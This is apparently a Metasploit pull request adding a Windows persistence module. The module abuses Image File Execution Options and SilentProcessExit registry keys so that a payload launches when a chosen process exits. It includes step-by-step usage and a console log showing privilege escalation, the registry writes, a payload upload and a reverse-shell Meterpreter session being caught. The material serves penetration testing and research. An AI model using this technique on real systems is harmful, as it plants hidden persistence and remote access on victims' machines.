Add image execute options persistence module

[bwatters-r7]

This module adds a persistence vector to windows computers.

It relies on a debugger tool that allows you to launch a debugger when a specified process exits (normally or abnormally).

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• get an elevated session on a windows computer
• use exploit/windows/local/persistence_image_exec_options
• set session <session>
• set payload <desired payload> (optional)
• set verbose true (optional)
• set IMAGE_FILE <process to attach to>
• run
• use exploit/multi/handler
• set payload <desiredPayload>
• run
• on target, run binary specified by IMAGE_FILE
• on target, close binary specified by IMAGE_FILE

[*] Meterpreter session 8 opened (192.168.135.168:5555 -> 192.168.132.125:49675) at 2019-09-30 16:24:30 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 8...
msf5 exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options 
msf5 exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe
image_file => notepad.exe
msf5 exploit(windows/local/persistence_image_exec_options) > set session 8
session => 8
msf5 exploit(windows/local/persistence_image_exec_options) > run

[*] Attempting Persistence on DESKTOP-D1E425Q via session ID: 8
[*] Payload pathname = C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe
[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe

(Launch notepad on remote host, then exit)

[*] Started reverse TCP handler on 192.168.135.168:4545 
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4545 -> 192.168.132.125:49679) at 2019-09-30 16:25:49 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

[busterb]

Oh for pete's sake, this is neat. I guess you can do something similar with core handlers on Linux systems

[busterb]

Release Notes

This adds a module for persisting a payload session by using a Windows feature that allows for debugging a specified process by name. The module does require escalated privileges initially in order to configure the debug process.